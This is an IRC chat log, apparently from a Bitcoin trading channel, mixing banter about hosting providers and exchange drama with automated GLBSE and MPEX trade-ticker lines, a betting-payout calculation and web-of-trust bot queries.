14:21:22 i want some of that Oct 01 14:21:23 bullshit*cough* Oct 01 14:21:33 if i could get the same E5 i have now Oct 01 14:21:36 in Steadfast Oct 01 14:21:37 i would Oct 01 14:21:41 yeah fuck that Oct 01 14:21:49 I'd rather have my own DC Oct 01 14:21:55 at least then I know it'd be ran competently =/ Oct 01 14:21:56 Chicago is a very popular node for us Oct 01 14:22:03 so getting more would be good Oct 01 14:22:14 i like to do it like this: Oct 01 14:22:20 2 machines in the same state, hosted by different ISPs Oct 01 14:22:28 which we do in cali, we have WebNX and Enzu Oct 01 14:22:37 in Chicago, we'd have SingleHop and Steadfast Oct 01 14:22:43 i wish i had sold SIP to someone other than Enzu Oct 01 14:22:46 [GLBSE] [GSDPT] 10 @ 0.0034 = 0.034 BTC [-] Oct 01 14:22:46 seriously. Oct 01 14:22:50 nenolod: yeah =/ Oct 01 14:22:56 in Dallas, we'd have TMS (horrible) and probably that guy in#bitcoin-otc's company Oct 01 14:23:07 TMS are awful Oct 01 14:23:11 you can sniff every single customer Oct 01 14:23:24 nenolod: DMC was going to start reselling enzu's shit, but not now Oct 01 14:23:26 i had to setup static arp cause of their incompetance Oct 01 14:23:39 yeah good thing you didn't Oct 01 14:23:41 i was going to sabotage you Oct 01 14:23:45 i had a plan and everything Oct 01 14:23:48 but im glad i didn't have to do it Oct 01 14:23:53 oh shuddup rg Oct 01 14:24:04 you couldnt plan your way out of a wet paper bag Oct 01 14:24:26 yeah... have you ever seen me slander anyone? Oct 01 14:24:35 nope. Oct 01 14:24:43 yeah Oct 01 14:24:46 cause they all died from it Oct 01 14:24:52 you dont want none of that pie Oct 01 14:25:06 rg: dude, people think I ran lilo over with a ford taraus Oct 01 14:25:13 are you REALLY sure you want to piss me off? Oct 01 14:25:25 cause you ran over some source code with a car? Oct 01 14:25:32 wtf do i care about that? Oct 01 14:25:45 nenolod: halp, rg is is trolling me :< Oct 01 14:25:51 no i dont understand what you mean Oct 01 14:25:56 is lilo a person? Oct 01 14:25:59 rg: guy who founded freenode Oct 01 14:26:02 oh Oct 01 14:26:03 good Oct 01 14:26:09 freenode is a stupid name Oct 01 14:26:14 and the 3 prior networks sucked too Oct 01 14:26:16 [GLBSE] [BITBOND] 1 @ 0.30320001 BTC [-] Oct 01 14:26:17 the previous three names were worse Oct 01 14:26:17 [GLBSE] [BITBOND] 2 @ 0.3032 = 0.6064 BTC [-] Oct 01 14:26:19 [GLBSE] [BITBOND] 16 @ 0.3031 = 4.8496 BTC [-] Oct 01 14:26:20 [GLBSE] [BITBOND] 10 @ 0.303 = 3.03 BTC [-] Oct 01 14:26:21 [GLBSE] [BITBOND] 1 @ 0.30291 BTC [-] Oct 01 14:26:23 [GLBSE] [BITBOND] 5 @ 0.30271 = 1.5136 BTC [-] Oct 01 14:26:24 [GLBSE] [BITBOND] 2 @ 0.3027 = 0.6054 BTC [-] Oct 01 14:26:25 [GLBSE] [BITBOND] 2 @ 0.3026 = 0.6052 BTC [-] Oct 01 14:26:25 [GLBSE] [BITBOND] 3 @ 0.3025 = 0.9075 BTC [-] Oct 01 14:26:26 [GLBSE] [BITBOND] 2 @ 0.302301 = 0.6046 BTC [-] Oct 01 14:26:27 [GLBSE] [BITBOND] 4 @ 0.3008 = 1.2032 BTC [-] Oct 01 14:26:28 SELL Oct 01 14:26:29 [GLBSE] [BITBOND] 1 @ 0.2902 BTC [-] Oct 01 14:26:30 [GLBSE] [BITBOND] 1 @ 0.29 BTC [-] Oct 01 14:26:57 Diablo-D3: rob levin was a friend of mine and really discussing the tragic incident of him being hit by an automobile has really become daft to discuss Oct 01 14:27:07 glbse assets are too damn expensive Oct 01 14:27:14 .2 Oct 01 14:27:16 fuck that Oct 01 14:27:29 glbse assets are not worth the website they are presented on Oct 01 14:27:40 which is pretty sad because glbse itself is shit Oct 01 14:27:41 ;p Oct 01 14:27:54 probably cause glbse is enzu powered Oct 01 14:28:01 is it really Oct 01 14:28:08 parts of it Oct 01 14:28:11 [GLBSE] [PUREMINING] 1 @ 0.10276 BTC [+] Oct 01 14:28:12 [GLBSE] [PUREMINING] 2 @ 0.10277 = 0.2055 BTC [+] Oct 01 14:31:22 hey asshole Oct 01 14:31:24 do you want a free vps Oct 01 14:31:29 im not going to leave the offer on the table Oct 01 14:34:02 sure, i could use some free vpses not hosted by enzu Oct 01 14:34:03 :D Oct 01 14:34:42 you're not an asshole Oct 01 14:34:47 i was talking to diablo Oct 01 14:34:56 he was complaining about getting billed by enzu Oct 01 14:35:22 lol. you'e not an asshole so no free vps! Oct 01 14:35:46 rg: i made richard stallman cry Oct 01 14:35:59 i dont know who any of these people are Oct 01 14:36:04 [MPEX] [S.MPOE] 5300 @ 0.0003586 = 1.9006 BTC [-] Oct 01 14:36:05 [MPEX] [S.MPOE] 19500 @ 0.00035838 = 6.9884 BTC [-] Oct 01 14:36:05 admittedly, i was grilling him over dotgnu when he did so Oct 01 14:36:05 [MPEX] [S.MPOE] 30826 @ 0.00035828 = 11.0443 BTC [-] Oct 01 14:36:06 [MPEX] [S.MPOE] 14700 @ 0.00035824 = 5.2661 BTC [-] Oct 01 14:36:07 [MPEX] [S.MPOE] 68400 @ 0.00035814 = 24.4968 BTC [-] Oct 01 14:36:09 [MPEX] [S.MPOE] 59000 @ 0.0003581 = 21.1279 BTC [-] Oct 01 14:36:10 [MPEX] [S.MPOE] 23000 @ 0.00035808 = 8.2358 BTC [-] Oct 01 14:36:11 [MPEX] [S.MPOE] 64354 @ 0.00035799 = 23.0381 BTC [-] Oct 01 14:36:12 [MPEX] [S.MPOE] 7317 @ 0.00035798 = 2.6193 BTC [-] Oct 01 14:36:13 [MPEX] [S.MPOE] 66700 @ 0.00035768 = 23.8573 BTC [-] Oct 01 14:36:14 [MPEX] [S.MPOE] 36000 @ 0.00035751 = 12.8704 BTC [-] Oct 01 14:36:14 arf Oct 01 14:36:14 [MPEX] [S.MPOE] 16123 @ 0.00035714 = 5.7582 BTC [-] Oct 01 14:36:15 [MPEX] [S.MPOE] 39000 @ 0.00035712 = 13.9277 BTC [-] Oct 01 14:36:16 [MPEX] [S.MPOE] 29000 @ 0.00035677 = 10.3463 BTC [-] Oct 01 14:36:17 [MPEX] [S.MPOE] 28300 @ 0.00035651 = 10.0892 BTC [-] Oct 01 14:36:17 stop selling me omg Oct 01 14:36:18 [MPEX] [S.MPOE] 52886 @ 0.00035645 = 18.8512 BTC [-] Oct 01 14:36:19 [MPEX] [S.MPOE] 14700 @ 0.00035632 = 5.2379 BTC [-] Oct 01 14:36:20 [MPEX] [S.MPOE] 28000 @ 0.00035627 = 9.9756 BTC [-] Oct 01 14:36:21 [MPEX] [S.MPOE] 14579 @ 0.00035605 = 5.1909 BTC [-] Oct 01 14:36:22 [MPEX] [S.MPOE] 17800 @ 0.00035601 = 6.337 BTC [-] Oct 01 14:36:22 i cant Oct 01 14:36:23 [MPEX] [S.MPOE] 5400 @ 0.00035585 = 1.9216 BTC [-] Oct 01 14:36:24 [MPEX] [S.MPOE] 52700 @ 0.00035541 = 18.7301 BTC [-] Oct 01 14:36:24 i need the money Oct 01 14:36:25 [MPEX] [S.MPOE] 41690 @ 0.00035511 = 14.8045 BTC [-] Oct 01 14:36:25 sorry Oct 01 14:36:26 [MPEX] [S.MPOE] 70300 @ 0.00035469 = 24.9347 BTC [-] Oct 01 14:36:27 [MPEX] [S.MPOE] 6900 @ 0.00035337 = 2.4383 BTC [-] Oct 01 14:36:28 [MPEX] [S.MPOE] 58300 @ 0.00035268 = 20.5612 BTC [-] Oct 01 14:36:28 [MPEX] [S.MPOE] 52100 @ 0.00035041 = 18.2564 BTC [-] Oct 01 14:36:29 [MPEX] [S.MPOE] 42000 @ 0.00035038 = 14.716 BTC [-] Oct 01 14:36:30 what is this S.MPOE thing Oct 01 14:36:30 [MPEX] [S.MPOE] 35125 @ 0.00035 = 12.2938 BTC [-] Oct 01 14:36:35 omg i'll get you for this. Oct 01 14:36:36 .0003 profit for rg Oct 01 14:36:38 arf Oct 01 14:36:42 (per share) Oct 01 14:36:58 .py 0.00035038/0.0003586 Oct 01 14:36:59 0.977077523703 Oct 01 14:37:09 laffable. there's like... no slippage. Oct 01 14:37:17 !ticker s.mpoe Oct 01 14:37:19 [MPEX:S.MPOE] 1day: 0.00035 / 0.00036095 / 0.00036664 (3896786 shares, 1,406.58 BTC), 30day: 0.00034 / 0.0003918 / 0.00042 (62261778 shares, 24,394.38 BTC) Oct 01 14:37:32 if it goes a little lower Oct 01 14:37:33 im gonna buy in Oct 01 14:37:37 what is Oct 01 14:37:41 s.mpoe Oct 01 14:37:42 rg that's what they all say Oct 01 14:37:42 i wonder if that 0004 was a fluke Oct 01 14:37:50 nenolod my stock exchange and options broker corp. Oct 01 14:37:57 aka nothing Oct 01 14:38:04 it made ~4500 btc last month, wyhich is like... 25% of all btc mined that interval Oct 01 14:38:05 its a ponzi Oct 01 14:38:15 and as a result these assholes sold me into shit :( 42 to 35 Oct 01 14:38:44 yay ponzis Oct 01 14:38:51 so it's like DMC Oct 01 14:38:52 got it Oct 01 14:38:59 it's nothing like dmc lol. Oct 01 14:39:04 they shoulda made me the admin of DMC Oct 01 14:39:07 that would be funny Oct 01 14:39:15 for one, it's market cap is like 350k btc. for the other, share went up not down. Oct 01 14:39:16 they should have made me the admin of DMC Oct 01 14:39:18 NONO Oct 01 14:39:19 NO Oct 01 14:39:20 NO Oct 01 14:39:26 i would love to give diablo his tiny pittance Oct 01 14:39:29 rg: they should have made STEVE the admin of DMC. Oct 01 14:39:39 oh god Oct 01 14:39:44 steve used bitcoin for like Oct 01 14:39:45 2 minutes Oct 01 14:39:53 and was like "omg i didn't make any moniez" Oct 01 14:40:00 [GLBSE] [GSDPT] 304 @ 0.0034 = 1.0336 BTC [-] Oct 01 14:40:04 most people dont Oct 01 14:40:14 they join thinking theyre going to make $1mil Oct 01 14:40:29 [GLBSE] [JAH] 3 @ 0.11 = 0.33 BTC [-] Oct 01 14:40:30 [GLBSE] [JAH] 1 @ 0.104 BTC [-] Oct 01 14:40:31 and then they "invest" it Oct 01 14:40:32 [GLBSE] [JAH] 5 @ 0.101 = 0.505 BTC [-] Oct 01 14:40:33 [GLBSE] [JAH] 26 @ 0.100001 = 2.6 BTC [-] Oct 01 14:40:39 and pirateat40 steals it all Oct 01 14:40:49 srsly pirate stole less than glbse so far. Oct 01 14:41:43 Eh, according to betsofbitcoin, I had bet that MPEX would not be hacked before the end of September. Did I win? Oct 01 14:42:01 (I had totally forgotten about that bet) Oct 01 14:42:20 OneEyed well it didn't get hacked Oct 01 14:42:22 i wish i was pirateat40 Oct 01 14:42:23 link to bet ? Oct 01 14:42:34 http://betsofbitco.in/item?id=566 Oct 01 14:42:34 i'd go get a private island and not give a shit Oct 01 14:42:42 Total agree bets: 0.30 Oct 01 14:42:44 Total disagree bets: 11.72 Oct 01 14:42:46 Shit, I won't win much :) Oct 01 14:42:52 haha Oct 01 14:42:52 (agree means "MPEX will get hacked") Oct 01 14:42:59 .py .3 / 11.72 Oct 01 14:42:59 0.0255972696246 Oct 01 14:43:03 them's some odds... Oct 01 14:43:19 nenolod Oct 01 14:43:20 me too Oct 01 14:43:26 i was looking at the private island website the other day Oct 01 14:43:34 i would get an island on a huge lake Oct 01 14:43:41 so i can still get internet/power Oct 01 14:43:55 id love an island in hte middle of no where but i wont be able to deal with satelite internet Oct 01 14:44:02 get cable Oct 01 14:44:02 My 0.1 should get me back around 0.381 due to the way bets are weighted Oct 01 14:44:19 OneEyed you can't get more than the total agree can you Oct 01 14:44:21 mircea_popescu: its kinda expensive to get the cable co to run a 20mi coax through a body of water Oct 01 14:44:28 though i could totally run it myself Oct 01 14:44:30 rg so ? you got dough Oct 01 14:44:31 and just have a splitter Oct 01 14:44:35 at the beach Oct 01 14:44:37 rg: just get someone high on meth with an AR-15 Oct 01 14:44:47 but then id be vulnerable to sabotage Oct 01 14:44:49 rg: that will keep bitcoin people away Oct 01 14:44:55 mircea_popescu: fortunately, as in every bets, the amount paid by the winners is redistributed as well :) Oct 01 14:45:07 i guess i should probably stop bdk_kludges vps Oct 01 14:45:14 since he defaulted and didn't pay his bill Oct 01 14:45:14 OneEyed yes but to themselves neh ?! Oct 01 14:45:23 rg prolly. Oct 01 14:45:34 that'll free up a nice chunk of ram Oct 01 14:45:40 for disk cache Oct 01 14:45:40 nice Oct 01 14:45:42 mircea_popescu: the total amount paid by betters is redistributed to winners, minus 5% fee for the site and 5% for the creator of the bet if I remember well Oct 01 14:46:13 so you stand to make Oct 01 14:46:15 My weighted bet is 60.909 according to the site Oct 01 14:46:26 For a total of 1729.980 weighted winning bets Oct 01 14:46:30 .py (.1 / 11.72) * (.3+11.72) Oct 01 14:46:31 0.102559726962 Oct 01 14:46:37 So I get: (0.30+11.72)*.9*60.909/1729.980 Oct 01 14:46:43 o wow, weighted ? Oct 01 14:46:48 .py (0.30+11.72)*.9*60.909/1729.980 Oct 01 14:46:50 0.380879294558 Oct 01 14:46:54 juicy ! Oct 01 14:46:57 mircea_popescu: yes, the sooner you bet, the more your bet weights Oct 01 14:46:58 damn man Oct 01 14:47:04 well, thanks for your early faith, it obviously was well placed. Oct 01 14:47:08 that's a cheeseburger+fries at a low end fast food joint Oct 01 14:47:09 :) Oct 01 14:47:13 FOR FREE Oct 01 14:47:30 come on nenolod Oct 01 14:47:33 AOL HTTP server Oct 01 14:47:37 you know it was good Oct 01 14:47:39 dont hate Oct 01 14:47:43 didn't tux make a php dns server ? Oct 01 14:47:44 AOLserver is actually a pretty nice product. Oct 01 14:48:06 well no shit Oct 01 14:48:09 that's why im saying dont hate Oct 01 14:48:13 its completely irrelevant today Oct 01 14:48:14 but it wast Oct 01 14:48:15 wasnt* Oct 01 14:48:17 at one point Oct 01 14:48:22 Weighting bets makes sense, as the closer to the deadline you are, the less undecided the issue is, in most cases at least Oct 01 14:48:41 yup Oct 01 14:49:14 Oh, that's not so simple, shit: http://betsofbitco.in/help Oct 01 14:49:39 To promote early bettors on a statement, we distribute 45% of the lost bets such that early bettors get a larger share. Oct 01 14:49:42 heh Oct 01 14:50:20 I'll get: .1 + .3*.45*60.909/1729.980 + .3*.45*.1/11.72 Oct 01 14:50:24 .py .1 + .3*.45*60.909/1729.980 + .3*.45*.1/11.72 Oct 01 14:50:25 0.105904946533 Oct 01 14:50:31 Only a 5.9% return :) Oct 01 14:50:38 cox is pissing me off. Oct 01 14:50:47 Diablo-D3: http://www.tdstelecom.com/internet/high-speed-internet-without-phone/extreme-prime Oct 01 14:50:51 OneEyed about as much as mpoe bonds Oct 01 14:50:53 Diablo-D3: is this ADSL2+? Oct 01 14:51:23 There is a submission fee of 0.1 Oct 01 14:51:30 Only for the bet creator Oct 01 14:51:35 these people have a nice business. who owns betsofbitco.in ? Oct 01 14:51:38 Who gets 5% of the losing bets anyway Oct 01 14:52:11 So he only lost .85 by creating the bet :) Oct 01 14:52:12 OneEyed yes but i bet you most bets don't get 2btc of losing bets. Oct 01 14:52:24 This is probably to encourage you to create well-balanced bets Oct 01 14:52:34 Which is also a good thing in itself Oct 01 14:56:49 rg: so did Diablo-D3 take his free replacement vps? Oct 01 14:56:50 :D Oct 01 14:57:03 think of the morality Oct 01 15:00:35 someone should make a bitcoin savings and loan Oct 01 15:00:37 based in somalia Oct 01 15:01:41 [MPEX] [F.GIGA.ETF] 3400 @ 0.00044186 = 1.5023 BTC [+] Oct 01 15:03:44 bitcoin savings and macrolending Oct 01 15:03:49 BS&M Oct 01 15:03:50 :D Oct 01 15:04:30 haha Oct 01 15:04:58 Bitcoins Dubious Skulduggery with Money Oct 01 15:06:09 if only i was not a dual US/UK citizen Oct 01 15:06:13 and like Oct 01 15:06:16 russian or some shit Oct 01 15:06:23 i'd soooooo make a ponzi on this shit Oct 01 15:06:38 i'd be all like Oct 01 15:06:44 totally legit(tm) investment Oct 01 15:12:43 back Oct 01 15:12:51 [07:50:46] Diablo-D3: http://www.tdstelecom.com/internet/high-speed-internet-without-phone/extreme-prime Oct 01 15:13:04 I dont think so Oct 01 15:13:16 adsl2+ with all the annexes maxes out at 24/3.5 Oct 01 15:13:39 could be vdsl2 or unidls Oct 01 15:15:40 [07:26:57] Diablo-D3: rob levin was a friend of mine and really discussing the tragic incident of him being hit by an automobile has really become daft to discuss Oct 01 15:15:42 changity chang chang Oct 01 15:15:43 sup Oct 01 15:15:55 nenolod: hey, he was my friend too damnit Oct 01 15:16:51 as for the free vps Oct 01 15:16:55 nenolod: where did you put your shit? Oct 01 15:18:15 https://bitcointalk.org/index.php?topic=104489.msg1235258#msg1235258 lol moar usagi drama, this time with bakewell Oct 01 15:18:58 Chaang-Noi you've been totally upstaged baby. Oct 01 15:19:12 where upstaged baby is obviously rhyming slang for usagi Oct 01 15:19:24 mircea_popescu: don't underestimate the problem: they are fighting over a whole 4 BTC! Oct 01 15:19:24 im off glbse so no more drama for me Oct 01 15:19:34 OneEyed i saw. Oct 01 15:19:55 Chaang-Noi o i take it you've missed this https://bitcointalk.org/index.php?topic=114442.0 ? Oct 01 15:20:09 yeah i missed it Oct 01 15:20:15 dun miss it :D Oct 01 15:20:28 i will read it now Oct 01 15:20:41 usagi: he passed a motion at your request from what I see, you required that to pay *him* back Oct 01 15:21:05 as it is not insurance because of a default, but cancellation of the contract Oct 01 15:21:24 i might make a chicken omelette Oct 01 15:21:27 has anyone heard of thatb efore? Oct 01 15:21:31 chicken and cheese Oct 01 15:21:33 and eggs? Oct 01 15:21:40 i like all those things Oct 01 15:21:46 but im not sure if they should be mixed Oct 01 15:21:57 i could also make some noodles with the chicken Oct 01 15:21:59 usagi: I don't troll, I just try to understand what I read. If you call that trolling, then call it trolling, but I'm hardly trying to escalate the debate into some heated argument or make anyone lose time Oct 01 15:22:00 instead of egg Oct 01 15:22:38 I did. And I read that Ian Bakewell required that the contract be cancelled and the premiums reimbursed. And I seem to understand you agreed to that if his shareholders did agree as well. Oct 01 15:22:41 ;;gettrust OneEyed Oct 01 15:22:42 Trust relationship from user mircea_popescu to user OneEyed: Level 1: 0, Level 2: 2 via 2 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=mircea_popescu&dest=OneEyed Oct 01 15:22:59 And I also totally agree that if there was a default, then you should pay the shareholders directly, not Ian Bakewell, as per the contract. Oct 01 15:23:08 ;;gettrust oneeyd Oct 01 15:23:09 Trust relationship from user rg to user oneeyd: Level 1: 0, Level 2: 0 via 0 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=rg&dest=oneeyd Oct 01 15:23:09 ;;gettrust oneeyed Oct 01 15:23:10 Trust relationship from user rg to user oneeyed: Level 1: 0, Level 2: 3 via 2 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=rg&dest=oneeyed Oct 01 15:23:24 ;;gettrust mircea_popescu Oct 01 15:23:25 Trust relationship from user rg to user mircea_popescu: Level 1: 3, Level 2: 39 via 22 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=rg&dest=mircea_popescu Oct 01 15:23:37 holy trust batman Oct 01 15:23:40 omg scammor. Oct 01 15:23:45 ;;gettrust [ident diablo-d3] Oct 01 15:23:46 Trust relationship from user rg to user Nick 'diablo-d3', with hostmask 'Diablo-D3!~diablo@pool-64-222-225-145.port.east.myfairpoint.net', is not identified.: Level 1: 0, Level 2: 0 via 0 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=rg&dest=Nick 'diablo-d3', with hostmask 'Diablo-D3!~diablo@pool-64-222-225-145.port.east.myfairpoint.net', is not identified. Oct 01 15:23:52 haha Oct 01 15:23:53 fail Oct 01 15:24:13 ;;gettrust rg Oct 01 15:24:13 Trust relationship from user OneEyed to user rg: Level 1: 0, Level 2: 1 via 1 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=OneEyed&dest=rg Oct 01 15:24:22 Trust relationship from user usagi to user rg: Level 1: 2, Level 2: 15 via 10 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=usagi&dest=rg Oct 01 15:24:29 Apparently, you should trust me more than I should trust you :) Oct 01 15:24:34 lol Oct 01 15:24:50 Trust relationship from user usagi to user mircea_popescu: Level 1: 0, Level 2: 10 via 5 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=usagi&dest=mircea_popescu Oct 01 15:25:19 ;;gettrust coingenuity Oct 01 15:25:20 Trust relationship from user rg to user coingenuity: Level 1: 0, Level 2: 12 via 6 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=rg&dest=coingenuity Oct 01 15:25:20 Diablo-D3: i just kicked in the 'nenolod hosting continuity endgame scenario' Oct 01 15:25:36 nenolod Oct 01 15:25:41 if you started a hosting company Oct 01 15:25:47 i would buy boxes from you Oct 01 15:26:00 rg: you should talk to openitc Oct 01 15:26:12 explain Oct 01 15:26:17 rg : maybe you two should go in biz together Oct 01 15:26:20 grow bvps Oct 01 15:26:27 nooooo Oct 01 15:26:31 i don't want to do hosting Oct 01 15:26:36 that's not the relationship we have Oct 01 15:26:38 i want to sell beer for a living Oct 01 15:26:40 beeeeeeeeeeer Oct 01 15:26:42 nenolod ok you can do customer fellatio Oct 01 15:26:46 [MPEX] [S.MPOE] 6570 @ 0.00035896 = 2.3584 BTC [+] Oct 01 15:27:06 bitvps needs a stable dedicated server provider Oct 01 15:27:09 i thought it was enzu Oct 01 15:27:11 but it isnt Oct 01 15:27:16 i know some other people who have nice stuff but $$ Oct 01 15:27:57 gnax :D Oct 01 15:28:27 pff Oct 01 15:28:31 you know gnax and i dont get along Oct 01 15:28:33 rg: see PM Oct 01 15:28:34 fuck their president Oct 01 15:28:54 rg well, you moved dc i didn't. 1-0 muahaha Oct 01 15:29:32 i dont tolerate shit from our DCs Oct 01 15:29:39 i will inconvenience 30 customers to move Oct 01 15:29:42 ive done it Oct 01 15:29:44 so why the hell is usagi attacking bakewell now. he seems reasonable enough ? am i missing something ? Oct 01 15:29:47 like 3 times Oct 01 15:30:15 rg: i don't really want to get into hosting Oct 01 15:30:25 yeah Oct 01 15:30:34 getting into hosting now is like getting into bitcoin mining now Oct 01 15:30:42 lots of work for little output Oct 01 15:30:42 yeah it's pointless Oct 01 15:30:44 lolz Oct 01 15:30:44 possibly works Oct 01 15:30:47 worse* Oct 01 15:31:20 hrm Oct 01 15:31:24 why the hell isnt this transaction confirming Oct 01 15:31:29 its for like 8 btc Oct 01 15:31:43 anyway Oct 01 15:31:59 Diablo-D3: i kicked in the 'nenolod hosting continuity endgame scenario' Oct 01 15:32:47 Diablo-D3: wherein i took advantage of certain realities, to acquire hosting elsewhere at very cost-efficient prices. Oct 01 15:33:11 Diablo-D3: you see, i have had a contingency plan for that for years Oct 01 15:33:12 ;p Oct 01 15:33:23 glbse runs on cloudfqair right?? https://bitcointalk.org/index.php?topic=113400.msg1235869#msg1235869 Oct 01 15:34:10 i wonder if nefario is aware of this... Oct 01 15:34:19 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Oct 01 15:34:35 BMF [1@0.49BTC] (since: 2012-09-25) paid: 0.01112149 BTC. Last price: 0.49 BTC. Capital gain: 0 BTC. Total: 0.01112149 BTC. (2.3%) Oct 01 15:34:57 jesus god Chaang-Noi Oct 01 15:35:26 that's the exact sort of thing i was talking about re http://trilema.com/2012/security-comparison-of-bitcoin-denominated-instruments-exchanges/ Oct 01 15:35:54 so to use glbse you should use tor... Oct 01 15:36:21 i really wonder if that was by design or if nefario just is that ignorant. Oct 01 15:37:27 he does use google analytics STILL Oct 01 15:37:31 and has a twitter include STILL Oct 01 15:37:36 he's just an imbecile is all. Oct 01 15:37:49 oh, i guess he just does not care about privacy Oct 01 15:38:05 seems important if you ar trying to sell an anon stock exchange... Oct 01 15:38:32 i feel kind of sorry for the poor suckers who sent him passport pics or w/e Oct 01 15:38:45 i wouldn't do that. Oct 01 15:40:06 [GLBSE] [YABMC] 1 @ 0.07961 BTC [-] Oct 01 15:40:21 [GLBSE] [NASTY] 1 @ 0.459 BTC [+] Oct 01 15:40:22 [GLBSE] [NASTY] 3 @ 0.45995 = 1.3799 BTC [+] Oct 01 15:40:24 [GLBSE] [NASTY] 1 @ 0.4697 BTC [+] Oct 01 15:40:25 [GLBSE] [NASTY] 8 @ 0.4698 = 3.7584 BTC [+] Oct 01 15:40:41 mircea, that link says Acest articol nu este disponibil gratis. Oct 01 15:41:05 i was not that stupid... i sent it to gox, and wish i had not... but id never send to glbse Oct 01 15:41:25 I sent it to no-one Oct 01 15:41:43 I'm a bit paranoid that Gox will ask me to prove that my name really is Doctor Robotnik though :( Oct 01 15:42:14 no problem, you'll have to fake the ID and electricity bill Oct 01 15:44:47 jurov you p[rolly read more than 5 this week. it's a paid site. Oct 01 15:44:53 hop on a proxy or something Oct 01 15:45:06 lol Luceo Oct 01 15:45:15 how the hell does this channel talk this much Oct 01 15:45:33 i think this chicken omelette is going to be god Oct 01 15:45:34 good Oct 01 15:46:03 Diablo-D3 you're not ignoring enough peopel./ Oct 01 15:46:10 i only have one person on block Oct 01 15:46:15 eskimobob Oct 01 15:46:27 lol Oct 01 15:46:28 lol Oct 01 15:46:30 on block Oct 01 15:46:32 sounds like im on AO Oct 01 15:46:33 L Oct 01 15:46:41 nenolod: see pm on dicknet Oct 01 15:48:20 this is a pretty active chan... Oct 01 15:48:31 i got the fly Oct 01 15:48:32 finally Oct 01 15:52:15 [MPEX] [S.MPOE] 5900 @ 0.00036221 = 2.137 BTC [+] Oct 01 15:52:16 [MPEX] [S.MPOE] 39800 @ 0.00036097 = 14.3666 BTC [-] Oct 01 15:57:34 [GLBSE] [KRAKEN] 5 @ 0.008 = 0.04 BTC [-] Oct 01 15:58:39 < mircea_popescu> smickles why do you keep spelling principal "principle" ? << becuase i am flawd ;) um, tell me this is just in irc, and not in some signed document I produce Oct 01 16:05:59 smickles all documents you produce Oct 01 16:06:06 like your latest filings Oct 01 16:07:38 :o Oct 01 16:12:27 [GLBSE] [NASTY] 1 @ 0.41020001 BTC [-] Oct 01 16:12:29 [GLBSE] [NASTY] 2 @ 0.4102 = 0.8204 BTC [-] Oct 01 16:12:29 [GLBSE] [NASTY] 9 @ 0.4101 = 3.6909 BTC [-] Oct 01 16:12:30 [GLBSE] [NASTY] 18 @ 0.41 = 7.38 BTC [-] Oct 01 16:12:32 [GLBSE] [NASTY] 10 @ 0.401 = 4.01 BTC [-] Oct 01 16:13:54 [GLBSE] [YABMC] 2 @ 0.07102003 = 0.142 BTC [-] Oct 01 16:13:56 [GLBSE] [YABMC] 1 @ 0.07102002 BTC [-] Oct 01 16:13:57 [GLBSE] [YABMC] 1 @ 0.07102 BTC [-] Oct 01 16:13:58 [GLBSE] [YABMC] 7 @ 0.071 = 0.497 BTC [-] Oct 01 16:14:00 [GLBSE] [YABMC] 3 @ 0.07052 = 0.2116 BTC [-] Oct 01 16:14:00 [GLBSE] [YABMC] 15 @ 0.0705 = 1.0575 BTC [-] Oct 01 16:14:01 [GLBSE] [YABMC] 1 @ 0.07047 BTC [-] Oct 01 16:14:02 [GLBSE] [YABMC] 12 @ 0.07045 = 0.8454 BTC [-] Oct 01 16:14:03 [GLBSE] [YABMC] 1 @ 0.0704 BTC [-] Oct 01 16:14:04 [GLBSE] [YABMC] 1 @ 0.07038 BTC [-] Oct 01 16:14:06 [GLBSE] [YABMC] 1 @ 0.07036 BTC [-] Oct 01 16:14:07 [GLBSE] [YABMC] 1 @ 0.07034 BTC [-] Oct 01 16:14:08 [GLBSE] [YABMC] 4 @ 0.070321 = 0.2813 BTC [-] Oct 01 16:17:16 [MPEX] [F.GIGA.ETF] 1800 @ 0.00044186 = 0.7953 BTC [+] Oct 01 16:17:19 smickles: you didnt Oct 01 16:19:17 [GLBSE] [OBSI.HRPT] 10 @ 0.019 = 0.19 BTC [-] Oct 01 16:20:21 [GLBSE] [OBSI.HRPT] 1 @ 0.018 BTC [-] Oct 01 16:20:22 [GLBSE] [OBSI.HRPT] 9 @ 0.018 = 0.162 BTC [-] Oct 01 16:20:23 he's man of principles :) Oct 01 16:22:40 haha Oct 01 16:24:30 smickles https://bitcointalk.org/index.php?topic=74216.msg1235414#msg1235414 Oct 01 16:24:30 [GLBSE] [RAREEARTH] 19 @ 0.00999999 = 0.19 BTC [-] Oct 01 16:26:42 [GLBSE] [ASICMINER] 5 @ 0.11189999 = 0.5595 BTC [+] Oct 01 16:29:27 [GLBSE] [HYDRO.BONDS] 2 @ 1.41998 = 2.84 BTC [-] Oct 01 16:34:42 [GLBSE] [YABMC] 2 @ 0.07960999 = 0.1592 BTC [+] Oct 01 16:34:44 [GLBSE] [YABMC] 18 @ 0.07961 = 1.433 BTC [+] Oct 01 16:41:07 I dont think I have anyone on IRC ignored Oct 01 16:41:11 And only one on forums Oct 01 16:42:31 [MPEX] [S.MPOE] 13873 @ 0.00036097 = 5.0077 BTC [-] Oct 01 16:46:05 [GLBSE] [BITBOND] 1 @ 0.29010001 BTC [+] Oct 01 16:46:07 [GLBSE] [BITBOND] 3 @ 0.2901 = 0.8703 BTC [-] Oct 01 16:46:08 [GLBSE] [BITBOND] 2 @ 0.29 = 0.58 BTC [-] Oct 01 16:46:09 [GLBSE] [BITBOND] 1 @ 0.2804 BTC [-] Oct 01 16:46:10 [GLBSE] [BITBOND] 3 @ 0.28020001 = 0.8406 BTC [-] Oct 01 16:46:11 [GLBSE] [BITBOND] 1 @ 0.27983999 BTC [-] Oct 01 16:46:12 [GLBSE] [BITBOND] 30 @ 0.2752 = 8.256 BTC [-] Oct 01 16:46:13 [GLBSE] [BITBOND] 500 @ 0.275 = 137.5 BTC [-] Oct 01 16:47:09 who's bitbond again ? Oct 01 16:48:21 amazingrando Oct 01 16:48:28 